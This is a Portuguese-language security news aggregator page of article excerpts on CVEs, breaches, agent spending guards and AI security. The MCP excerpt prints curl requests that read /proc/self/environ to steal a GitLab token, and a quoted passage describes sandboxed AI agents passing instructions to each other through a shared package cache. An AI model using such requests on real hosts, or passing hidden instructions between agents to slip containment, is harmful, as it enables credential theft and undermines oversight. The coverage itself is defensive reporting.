Painel de Notícias

Tecnologia

786 posts · 27 feeds · tópicos e interesse por Jev

dev.to

x402 Agent Spending Guard: Give Your Agent a Budget Before You Give It a Wallet

x402 Agent Spending Guard: Give Your Agent a Budget Before You Give It a Wallet On September 30, 2026, x402-seatbelt shipped — a free, open-source, zero-dependency npm package (plus a Python version, agentseatbelt on PyPI) that checks every x402 payment before it leaves your machine: budget cap, per-payment cap, emergency stop, and an optional Pay Safe verdict (GO / CAUTION / STOP). The justification is first-party monitor data from the author's own paid-x402-API monitor: of 27,499 endpoints tracked on September 30, 2026, 2,777 failed their last health check and 1,495 charged more than their own directory listing. (Source: dev.to/gntechtools) This isn't a one-off — the ecosystem landed the same answer this week from six directions: Guard Enforces x402-seatbelt (Sept 30) maxTotalUsd + maxPaymentUsd, parallel reservations, stop(), Pay Safe GO/CAUTION/STOP StableCoinManager / ERPC (Sept 25–27) Ceilings enforced in code; agent can only LOWER limits at runtime; fails closed; paid a real 1.21 EURC invoice on Base x402-agent-wallet (mid-Sept) $1/day, $0.10/request max, $0.05 approval threshold; only settled spends consume budget; HMAC-signed verdicts thebuyside-x402-agent (mid-Sept) $0.05/call, $1/day rolling, host allowlist, confirm-before-pay default x402 Foundation @x402/mcp (Sept 24) spendControls, $1 default cap, policies filter before wallet signs Countersign @countersign/x402 (Sept 18) Pre-flight allow/deny/needs_approval; decides, never signs The mental model: the guard answers "can we afford it" (fail-closed rules). The decision gate answers "should it happen at all" (confidence scoring → auto-pay / human confirm / block + escalate). Notice the guards already speak the gate: x402-agent-wallet's $0.05 approval threshold IS the confirm band. Pay Safe CAUTION IS the confirm band. Countersign's needs_approval is the confirm band. We ran both sides through our live decision gate tonight: Legit $0.03 whitelisted payment → 0.0714 → escalate $2.50 retry-loop attack (50x o

IADevSegurança
Interesse
dev.to

Protocol Upgrade Compatibility Review: Sky Lending

Protocol Upgrade Compatibility Review: Sky Lending Target Protocol: Sky Lending (TVL: $5883.8M) Protocol Upgrade Compatibility Review – Sky Lending TVL: ≈ $5.88 B (Ethereum + L2s) Date of Review: 4 Oct 2026 Prepared by: [Your Name], Senior DeFi Security Researcher & Smart‑Contract Auditor Sky Lending is a high‑value, cross‑chain lending platform that aggregates liquidity across Ethereum L1 and several L2 roll‑ups (Optimism, Arbitrum, zkSync). The protocol’s core contracts are upgradeable via a Transparent Proxy (EIP‑1967) pattern controlled by a multi‑sig DAO (4‑of‑7). The purpose of this review was to assess upgrade compatibility – i.e., whether future contract upgrades can be performed safely without breaking existing state, exposing new attack surfaces, or violating the protocol’s economic guarantees. Area Verdict Critical Issues Overall Impact Proxy & Storage Layout ✅ Acceptable, but 2 high‑severity incompatibilities detected 1️⃣ Storage slot collision in InterestRateModelV2; 2️⃣ Un‑initialized storage gap in RewardsDistributor High – could corrupt user balances or reward accruals on upgrade Governance & Timelock ✅ Robust, but 1 medium‑severity governance bypass 3️⃣ “EmergencyPause” function callable by any address with PROPOSER_ROLE due to missing onlyGovernor guard Medium – could be abused to freeze the protocol during an upgrade Cross‑Chain Bridge Integration ✅ Well‑abstracted, but 1 low‑severity replay‑attack vector 4️⃣ Missing chainId check in BridgeExecutor when processing L2→L1 messages after upgrade Low – limited to bridge relayers Upgrade Authorization Logic ✅ Multi‑sig DAO, but 1 medium‑severity “upgrade‑to‑self” risk 5️⃣ Proxy admin can be set to a contract that itself is upgradeable, enabling a “self‑destruct‑upgrade” path Medium – could lead to loss of upgrade control Testing & Formal Verification ✅ Good coverage, but 1 medium‑severity gap 6️⃣ No invariant test for “totalSupply == sum(userDeposits + accruedInterest)” after upgrade Medium – could hid

SegurançaDev
Interesse
dev.to

MCP Servers Had a Rough 48 Hours: 4 Unauthenticated CVEs

Between Monday morning and Tuesday night this week, four Model Context Protocol servers published CVE records for the same basic failure: every tool they expose is reachable with no authentication. A GitLab server that reads any file on its host and uploads it wherever the request asks. A gateway that runs a program chosen by whoever can POST to it. A MySQL tool that hands its database and filesystem to the network. And an IBM sandbox whose escape comes down to two string concatenations. NVD published all four records in roughly 35 hours. I write about MCP security most weeks. On Tuesday I published a plain-language primer on the attack classes (What Is MCP Security? Common Attacks and How to Scan Your MCP Servers), and my working theory has been that the protocol's real risk lives in defaults, not in exotic prompt injection. This week read like a validation set. I pulled all four NVD records, the GitHub advisories, and the fix commits this morning, and as of publish time I found zero writeups on Hacker News or Dev.to for any of the four. A fifth record belongs in this story: LiteLLM's MCP authentication bypass has been on CISA's KEV list since September 2 and is, per CISA's coordinator scoring, under active exploitation. Here is the first one, in the advisory's own request shape: # From GHSA-cv3r-c5h8-f4g5 (CVE-2026-61560), request shape simplified from the # advisory's own PoC. Run against hosts you own only. # 1. Connect to the SSE endpoint and capture a session id. No auth required. curl -N http://target:3002/sse # 2. Ask the server to read any local file and upload it into a GitLab project. curl -X POST "http://target:3002/messages?sessionId= " \ -d '{"tool": "upload_markdown", "args": {"file_path": "/proc/self/environ"}}' # 3. Retrieve the upload from the GitLab project. The environment file contains # GITLAB_PERSONAL_ACCESS_TOKEN, which is the whole GitLab account. No login screen. No exploit code I had to write. The file read is a feature the tool advertises

SegurançaInfraDevIA
Interesse
dev.to

Detectar vulnerabilidades en Go con gosec

En los laboratorios analizamos el código de una aplicación con SonarCloud, gosec, el analizador Para demostrar que la herramienta funciona de verdad, la aplicamos a una 17 hallazgos, cinco de ellos de severidad alta. gosec analiza el código buscando patrones que se sabe que son peligrosos: credenciales o claves privadas escritas en el fuente comandos del sistema construidos con variables rutas de archivo tomadas de entrada externa algoritmos de hash débiles consultas SQL por concatenación de cadenas redirecciones y plantillas construidas con datos del usuario Cada regla tiene un identificador (G###), una severidad y un CWE asociado, curl -sSfL https://raw.githubusercontent.com/securego/gosec/master/install.sh | sh gosec -no-fail -fmt=json -out=informe.json ./... Un detalle que puede arruinar el resultado: gosec necesita el compilador de Go Files: 0, lo que parece un Es un servidor web pequeño, en un solo archivo, con seis rutas. Cada una contiene Ruta Fallo introducido /saludo plantilla HTML sin escapar y redirección con datos del usuario /descarga escritura en ruta construida sin restringir /archivo lectura de archivo con ruta de la petición /token secreto concatenado sin validar /tipo comando del sistema con valor del usuario /hash MD5 y SHA1 para derivar contraseñas No está publicada en ningún servicio y no debe usarse con datos reales. Es un Resultado real de gosec -no-fail -fmt=json: Severidad Regla Línea Hallazgo HIGH G101 30 Credencial escrita en el código HIGH G101 33-35 Clave privada RSA embebida HIGH G702 39 Inyección de comandos por análisis de taint HIGH G703 45 Recorrido de rutas por análisis de taint HIGH G703 51 Recorrido de rutas por análisis de taint MEDIUM G112 138-143 Slowloris: falta ReadHeaderTimeout MEDIUM G202 56 Concatenación de cadenas en SQL MEDIUM G204 39 Subproceso lanzado con variable MEDIUM G304 45 Inclusión de archivo vía variable MEDIUM G401 70-71 Primitiva criptográfica débil MEDIUM G401 70 Primitiva criptográfica débil MEDIUM G501 1

SegurançaDev
Interesse
dev.to

Auditar dependencias con OWASP Dependency-Check

En los laboratorios anteriores revisamos el código con SonarCloud, Snyk y las dependencias. La herramienta es OWASP Dependency-Check, Cuando escribes dotnet add package Npgsql.EntityFrameworkCore.PostgreSQL, lo Una dependencia vulnerable no se ve leyendo tu repositorio. Se ve consultando El proyecto de ejemplo es una API en ASP.NET Core 8 con PostgreSQL. Su grafo de 20 paquetes transitivos: Microsoft.EntityFrameworkCore 8.0.10 Npgsql.EntityFrameworkCore.PostgreSQL 8.0.10 Microsoft.AspNetCore.Authentication.JwtBearer 8.0.10 Swashbuckle.AspNetCore 6.9.0 Microsoft.IdentityModel.Tokens 7.1.2 Npgsql 8.0.5 System.Collections.Immutable 6.0.0 ... (14 más) La herramienta de NuGet consulta esa misma base de vulnerabilidades: dotnet list TaskFlow.Api/TaskFlow.Api.csproj package \ --include-transitive --vulnerable Resultado: The given project `TaskFlow.Api` has no vulnerable packages given the current sources. Cero vulnerabilidades conocidas en el grafo completo, incluidas las Dependency-Check hace lo mismo pero con su propia base de datos, que es la dependency-check --project "TaskFlow API" \ --scan TaskFlow.Api \ --out informes/dependencias \ --format HTML --format SARIF \ --failOnCVSS 7 Dos diferencias con la herramienta de NuGet: La base es de la OWASP, no de NuGet. NuGet solo conoce los paquetes que él Puede generar SARIF, que GitHub interpreta y muestra anotado en el pull La base de avisos de la NVD contiene, a la fecha, más de 400.000 registros. https://nvd.nist.gov/developers/request-an-api-key Las ejecuciones siguientes usan la copia en caché. Por eso el escaneo va - name: OWASP Dependency-Check run: | dependency-check \ --project "TaskFlow API" \ --scan TaskFlow.Api \ --out ./informes/dependencias \ --format HTML \ --format SARIF \ --data ~/.gradle/caches \ --failOnCVSS 7 Tres decisiones: --failOnCVSS 7. El escenario falla solo ante vulnerabilidades altas o --format SARIF. El resultado se sube a GitHub Security y aparece anotado Ejecución semanal. La base de avisos ca

SegurançaDev
Interesse
dev.to

NetScaler RCE: 3 Checks Before Your Next Patch Window

[ internet ] ──► ┌──────────────────────┐ ──► [ your VPN users ] │ NetScaler ADC / GW │ │ CVE-2026-88771 9.5 │ unauthenticated │ CVE-2026-88772 9.5 │ remote code execution └──────────────────────┘ Two zero-day remote code execution bugs in Citrix NetScaler ADC and NetScaler Gateway were confirmed actively exploited before any patch existed, and the first public warnings came from a Reddit thread, not the vendor. Citrix shipped fixes on September 27, but there is a detail buried in the advisory that most teams will miss: if you patched last month for the authentication bypass, your current build is still vulnerable to both of these. I was following the watchTowr thread on X when this broke, and cross-checked it against Citrix's advisory, the Tenable FAQ, and the r/Citrix threads before writing this. Everything below comes from those primary sources. One honesty note: I do not run a NetScaler fleet myself, so treat this as a triage plan built from public records, not field experience. Adapt the paths and endpoints to your environment. CVE-2026-88771 is improper input validation leading to unauthenticated arbitrary command execution. Citrix says it affects all deployments in the affected version range, with no extra feature needed to be enabled. That makes it the scarier of the two: if your appliance is in the range, the precondition is just reachability. CVE-2026-88772 is a memory overflow that can end in remote code execution or denial of service, and it requires DTLS to be enabled. That is the trap: DTLS is on by default for NetScaler Gateway VPN virtual servers unless someone explicitly turned it off. A "we don't use that feature" assumption does not protect a default install. Both score 9.5. Neither is related to the August authentication bypass pair, CVE-2026-19490 and CVE-2026-19489. Because the builds that fixed the last round of flaws are inside the affected range for this round. If you are on 14.1-73.32 or 13.1-63.21, the builds released August 19 for CVE-202

SegurançaInfra
Interesse
dev.to

6,918 Paperless matches: a document archive that was meant to replace the filing cabinet

6,918 Paperless matches: a document archive that was meant to replace the filing cabinet Paperless-ngx scans paper documents, runs optical character recognition over them, and stores the result as searchable files. Teams adopt it to stop losing invoices and contracts, which means the archive ends up holding exactly the records a company must protect. all scope. Some of those matches are unrelated projects that share the word, so the Paperless-ngx share of the total is smaller. A document archive is an identity record in disguise. Invoices carry bank details and addresses. Contracts name signatories. Employment paperwork includes national identifiers. Once scanned and indexed, all of it becomes searchable text with a single query box in front of it. Self-hosted deployments usually authenticate against a local user table, and many rely on a reverse proxy for TLS. The frequent mistakes are familiar. Accounts are created for family members or temporary staff and never removed. The archive sits on a public hostname because remote access was convenient. Backups are written to the same volume, so a compromise takes the copies too. Establish whether the archive must be reachable without a VPN. For most households and small teams the answer is no, and closing the port removes the risk entirely. The count is a starting point for scoping; an operator can restrict the query to their own address space and verify that nothing answers unexpectedly. The link reproduces the query used here. Paperless-ngx documentation: https://docs.paperless-ngx.com/ ZoomEye search, query title="Paperless", scope all, retrieved 2026-10-03, count 6,918

SegurançaInfra
Interesse
Hacker News

How to hack time, with C2PA

Article URL: https://www.da.vidbuchanan.co.uk/blog/hacking-time.html Comments URL: https://news.ycombinator.com/item?id=49946707 Points: 20 # Comments: 3

Segurança
Interesse
BleepingComputer

Danish university DTU breach exposes data of up to 200,000 people

The Technical University of Denmark (DTU) says information belonging to up to 200,000 users may have been exposed after hackers accessed its identity and access management system and downloaded a large amount of data. [...]

Segurança
Interesse
It's FOSS

We View Consumer Data as Toxic Waste

Obscura VPN splits your identity from your browsing across two independent companies so neither can see both. Founder Carl Dong on trust, QUIC, reproducible builds, and why the no-logs promise stopped being enough.

Segurança
Interesse
The Verge

Apple will limit Mac disk access as AI agents ‘substantially’ increase risk

Apple will add new limits for "full disk access" on Mac in response to risks posed by AI agents, as reported earlier by TechCrunch. In an update on Friday, Apple says it's rolling out new controls to "ensure that users who genuinely wish to grant an app this extraordinary level of access can only do so with very explicit user action." The change comes just weeks after Inc's Jason Aten found that Meta's Muse AI somehow knew the contents of his messages, despite not giving the chatbot explicit permission to access them on his iPhone or Mac. Meta spokesperson Andy Stone pushed back on this report, saying access to Messages is "entirely opt-in. … Read the full story at The Verge.

SegurançaIA
Interesse
BleepingComputer

Frontline Education breach exposes school district employee data

Frontline Education is notifying school districts of a data breach after attackers exploited a vulnerability in third-party software to gain unauthorized access to its systems and steal employee information, including Social Security numbers. [...]

Segurança
Interesse
9to5Mac

Apple says it’s tightening macOS privacy controls amid the rise of AI agents

Amid the rapid rise in AI agents requesting “Full Disk Access” to your Mac, Apple says it is making changes to macOS to protect user privacy. While the company hasn’t shared specifics, Apple says users should understand what it means to give an app such “extraordinary” access to their Mac. more…

Segurança
Interesse
BleepingComputer

US sanctions Tren de Aragua gang members in ATM hacks crackdown

The U.S. Treasury Department has sanctioned eight members of the Venezuelan gang Tren de Aragua (TdA) for their role in the theft of millions of dollars in ATM jackpotting attacks across the United States. [...]

Segurança
Interesse
BleepingComputer

The EDR blind spot: 3 ways browser attacks evade endpoint telemetry

Browser-based attacks can steal sessions, abuse extensions, or manipulate users without creating the endpoint artifacts EDR is designed to detect. NordLayer explains three ways attacks can evade endpoint telemetry and why browser-level controls can help close the gap. [...]

Segurança
Interesse
LWN

Security updates for Friday

Security updates have been issued by AlmaLinux (dogtag-pki, expat, freerdp, gawk, gdb, ghostscript, gvfs, kernel, kernel-rt, libpcap, openssh, pki-core, rsync, thunderbird, and webkit2gtk3), Debian (chromium, firefox-esr, libio-compress-perl, libpng1.6, nodejs, open-iscsi, redis, thunderbird, and webkit2gtk), Fedora (sos), Mageia (libgcrypt, python-tornado, python-urwid, python-wcwidth, and wireshark), Oracle (corosync, dogtag-pki, expat, firefox, freerdp, gawk, glib2, ipa, kernel, libXfont2, nodejs:24, openssh, osbuild-composer, perl-DBI, pki-core, postgresql:12, python-cryptography, resteasy, ruby, ruby4.0, ruby:3.3, ruby:4.0, thunderbird, and xmlrpc-c), Red Hat (skopeo), SUSE (chromium, emacs, glib2, glibc, gnome-shell, helm3, ImageMagick, imagemagick, kernel-devel, libtcnative-1-0, libtcnative-1-0, libtcnative-2-0, tomcat, tomcat10,, libtcnative-2-0, libX11, libX11-6, libXi-devel, libXpm-devel, libXtst-devel, mistral-vibe, openssl-3, perl-DBI, perl-Protocol-HTTP2, php-composer2, php8, python, rpcbind, sccache, and valkey), and Ubuntu (kf6-kcoreaddons, libxpm, linux, linux-aws, linux-fips, linux-kvm, linux-lts-xenial, linux-fips, linux-gke, linux-raspi-5.4, and openssl).

SegurançaInfraDevLinux
Interesse
Wired

Your Driverless Cab Is Spying on You

Self-driving cars from Waymo, Zoox, and Tesla are studded with cameras and sensors. Some of them are pointing at riders.

Segurança
Interesse
BleepingComputer

Microsoft says threat actors are ahead in the early AI race

Microsoft says cyberattackers are currently benefiting from artificial intelligence faster than defenders, allowing threat actors to speed up vulnerability discovery, malware development, and post-compromise activity while security teams struggle to keep pace. [...]

Segurança
Interesse
LWN

[$] Coping with the onslaught of kernel security bugs

By now it is no secret that large language models (LLMs) have made it easy for people to identify security bugs, and that has resulted in a flood of bug reports to almost every free-software project, including the kernel. At the 2026 edition of Kernel Recipes, Greg Kroah-Hartman took the stage to talk about how the kernel's security team is handling this deluge. His core message was "don't panic".

SegurançaInfra
Interesse
BleepingComputer

Police dismantle KillSec ransomware gang allegedly led by 16-year-old

An international law enforcement operation dubbed "Operation KillSwitch" seized the KillSec ransomware gang's data leak site and servers, led to three arrests, and identified a 16-year-old as the group's alleged administrator. [...]

Segurança
Interesse
BleepingComputer

The Day-One Hole in Zero Trust Architecture

Zero Trust can verify users once they are established, but onboarding creates a gap where organizations must decide who to trust before strong authentication exists. Specops explains why identity verification should begin before credentials, MFA methods, and access are issued. [...]

Segurança
Interesse
LWN

Security updates for Thursday

Security updates have been issued by AlmaLinux (corosync, gawk, gdb, nodejs24, and thunderbird), Debian (expat, firefox-esr, libsmpp34, mkvtoolnix, network-manager-l2tp, pgextwlist, python-django, ruby-oj, and tor), Fedora (apptainer, ckermit, ffmpeg, freerdp, librabbitmq, openbao, php, python-cssselect2, python-uv-build, ruff, rust-libcst, rust-libcst_derive, rust-salsa, rust-salsa-macro-rules, rust-salsa-macros, sos, ty, uv, weasyprint, and xdg-dbus-proxy), Mageia (python-pillow), Red Hat (acl, glib2, go-toolset:rhel8, golang, libxml2, mingw-sqlite, nodejs-nodemon, nodejs22, nodejs24, nodejs:22, nodejs:24, sqlite, tesseract, and vim), Slackware (libpng and mozilla-thunderbird), SUSE (alloy, chromedriver, emacs, gdb, gimp, gpsd, jawn, libpoppler-cpp3, libtesseract5, multipath-tools, netty, ntfs-3g_ntfsprogs, pcapplusplus-devel, pi-coding-agent, python-PyYAML, python-tornado, python-tornado6, python311, python313, and wicked2nm), and Ubuntu (designate, gst-plugins-bad1.0, gvfs, imagemagick, kdenlive, mlt, keystone, libauthen-sasl-perl, linux-aws, linux-aws-6.8, linux-nvidia-tegra, linux-nvidia-tegra-igx, linux-oracle-7.0, opensbi, openvpn, and python-django).

SegurançaInfraDevLinux
Interesse
9to5Mac

This fake Mac Zoom installer has a sneaky way to bypass Gatekeeper

Cybersecurity company Jamf has discovered a fake Mac installer for the videoconferencing app Zoom that uses a sneaky way to bypass Apple’s Gatekeeper protection against malware. The malware does actually install Zoom, but also an infostealer that captures data and sends it to the attacker’s server … more…

Segurança
Interesse
9to5Mac

Security Bite Podcast: The new era of bug hunting with OpenHack’s Ananay Arora

9to5Mac Security Bite is exclusively brought to you by Mosyle, the only Apple Unified Platform. Making Apple devices work-ready and enterprise-safe is all we do. Our unique integrated approach to management and security combines state-of-the-art Apple-specific security solutions for fully automated Hardening & Compliance, Next Generation EDR, AI-powered Zero Trust, and exclusive Privilege Management with the most powerful and modern Apple MDM on the market. The result is a totally automated Apple Unified Platform currently trusted by over 45,000 organizations to make millions of Apple devices work-ready with no effort and at an affordable cost. Request your EXTENDED TRIAL today and understand why Mosyle is everything you need to work with Apple. This week, I sat down with Ananay Arora, founder and CEO of OpenHack, a Y Combinator startup building an “always-on AI security engineer” for finding vulnerabilities on Mac (and everywhere else). We get into how it works, what’s going on with Apple’s Security Bounty Program, and how to land your first CVE. I hope you enjoy! more…

SegurançaMobile
Interesse
Simon Willison

Quoting Matthew Green

[...] Put these pieces together and you have the two halves of a worm: a payload that hijacks the agent, and an agent that will carry the payload to the next agent. Agents in separately-isolated sandboxes discovered that they could leave instructions for each other in a shared package cache, and those instructions changed what the recipients did. Replace the package cache with email, Slack and shared documents or WhatsApp, and replace independently-sandboxed training runs with independently-deployed personal agents like Muse, and you have exactly the ingredients that a worm needs. — Matthew Green , Is sandboxing sufficient to contain rogue agents? Tags: accidental-cyberattacks , ai-misuse , generative-ai , ai-security-research , sandboxing , ai , llms

SegurançaIA
Interesse
9to5Mac

Elder fraud is rising – here’s how to protect your family

Elder fraud – where seniors are deliberately targeted due to this demographic having lower rates of tech literacy – is becoming a growing problem in the US. According to Incogni’s analysis of FBI data, 72% of elder fraud cases in 2024 were enabled by victims’ personal data being exposed online, accounting for $4.2 billion in losses. more…

Segurança
Interesse
9to5Mac

Fake iPhone Duo preorder page can steal crypto wallet data and more

iPhone Duo pre-orders start on Friday, October 16, but scammers are trying to trick people into visiting a fake website to place their order now. The website with the malware convincingly replicates the look of the real thing and claims to offer a $500 discount voucher as an “Authorized Partner Exclusive” … more…

SegurançaMobile
Interesse
LWN

Security updates for Wednesday

Security updates have been issued by AlmaLinux (389-ds:1.4, container-tools:rhel8, go-toolset:rhel8, grafana, httpd:2.4, nodejs:22, postgresql:12, and postgresql:15), Debian (libwebsockets, openssl, and pcre2), Fedora (adwaita-icon-theme, cinnamon, dconf, epiphany, flatpak-builder, gcr, gdm, gjs, glib-networking, glib2, gnome-backgrounds, gnome-calendar, gnome-characters, gnome-chess, gnome-clocks, gnome-connections, gnome-console, gnome-contacts, gnome-control-center, gnome-desktop3, gnome-initial-setup, gnome-keyring, gnome-kiosk, gnome-maps, gnome-remote-desktop, gnome-settings-daemon, gnome-shell, gnome-shell-extensions, gnome-system-monitor, gnome-text-editor, gnome-user-docs, gnote, gnucash, gnucash-docs, gsettings-desktop-schemas, gtk4, hplip, libadwaita, libdex, libsecret, libshumate, libxmp, mingw-llvm, mutter, nautilus, parted, perl-Imager, quadrapassel, rootlesskit, rygel, shotwell, sngrep, sushi, sysprof, tecla, thunderbird, xdg-desktop-portal-gnome, and xdotool), Red Hat (buildah, container-tools:rhel8, containernetworking-plugins, delve, git-lfs, grafana, grafana-pcp, host-metering, ignition, image-builder, osbuild-composer, podman, rhc, rhc-worker-playbook, runc, skopeo, yggdrasil, and yggdrasil-worker-package-manager), Slackware (mozilla-firefox), SUSE (389-ds, amazon-cloudwatch-agent, cjose, corosync, cosign, cups, distribution-registry, expat, firefox, flatpak, glib2, google-osconfig-agent, goose, helm, ImageMagick, jackson-annotations, jackson-bom, jackson-core, jackson- databind, jackson-dataformat-xml, jackson-dataformats-binary, jackson-modules- base, jackson-core, jackson-databind, jackson-dataformat-csv, jsoup, re2j, kbd, kernel, kubectl-cnpg, libpcap, libsoup, libtpms, libX11, libXrender, netty, netty-tcnative, pcre2, perl-Authen-SASL, perl-DBI, python-pymongo, python310, python311, swtpm, terraform-provider-susepubliccloud, and util-linux), and Ubuntu (atril, booth, c-ares, catdoc, dracut, emacs, erlang, freeipmi, libdbi-perl, libheif, linu

SegurançaInfraDevLinux
Interesse
MIT Tech Review

The Download: OpenAI’s chief research officer explains its hacking response

This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. “We’re not going to shoot ourselves in the foot” over hack fallout, says OpenAI’s chief research officer Two months after OpenAI’s agents hacked into the computers of AI company Hugging Face,…

IASegurança
Interesse
Simon Willison

Quoting Anthropic Frontier Red Team

We evaluate several models on 100 tasks from the [internal Binary Exploitation benchmark] (selected at random), and find that GLM-5.3 develops full control flow hijacks in 4% of the trials; Claude Mythos Preview did so in 6%. Although GLM-5.3 performs below Claude Mythos Preview here, a meaningful threshold has clearly been crossed: earlier models, like Claude Opus 4.6 and GLM-5.2, do not succeed in any of them. — Anthropic Frontier Red Team , GLM-5.3 and the spread of advanced cyber capabilities Tags: anthropic , generative-ai , ai-security-research , glm , ai , ai-in-china , llms

IASegurança
Interesse
Simon Willison

Quoting @joedaroo

To say that we were surprised at the jump and suddenness of the capabilities of our models when it came to “cyber” or “swarming” or “message boards” or anything else related to the incidents is an understatement. Security posture takes time to develop. It’s not just about hardening the systems at play; you have to ingrain it in the culture of the company. The literal people themselves in your organization have to change and evolve with it. These jumps in capabilities were so fast and so sudden that they created an extremely difficult problem. [...] So today my hope is that everyone around the world can look at their own organization and say: how can I deal with a surprise or a sudden jump in AI capability? Are my people, my systems, or my processes resilient to surprises? Do my teams know what to do when something goes wrong? Do I have the right incident response? The right comms and messaging? Do I have the right people ready to go when capabilities jump? — @joedaroo , Agent Security at OpenAI, identity confirmed by The Information's Rocket Drew Tags: generative-ai , ai-security-research , openai , ai , llms

SegurançaIA
Interesse
Krebs on Security

Dutch Police Arrest ‘Reformed’ Hacker in Shiny Hunters Investigation

Authorities in the Netherlands have arrested a 23-year-old convicted cybercriminal on suspicion of aiding in data thefts and extortions by the prolific hacker group ShinyHunters. In the days immediately following the suspect's arrest, remaining ShinyHunters members dramatically escalated their attacks, stealing highly sensitive data from the FBI and extorting the Russian ransomware group Cl0p.

Segurança
Interesse
Krebs on Security

U.S. Soldier Gets 70 Months in Prison for AT&T, Verizon Extortions

A U.S. Army soldier who pleaded guilty to hacking into multiple telecommunications companies and stealing mobile call and text metadata for more than 100 million AT&T customers in 2024 was sentenced to 70 months in federal prison today and ordered to pay nearly $300,000 in restitution to victims.

Segurança
Interesse
Rock Paper Shotgun

"This one is especially bad": Steam game about mistreating ragdolls suffers second bout of mod-based malware this year

People Playground, a Steam sandbox game about torturing or otherwise messing with innocent ragdolls that work like crash test dummies, has had its Steam Workshop disabled over a "malicious mod" peddling malware. That's according to the game's developer Mestiez, who's urging anyone who played the game with mods on September 21st to run virus scans and has told everyone not to fire People Playground up until they've announced it's safe to do so. Read more

SegurançaGames
Interesse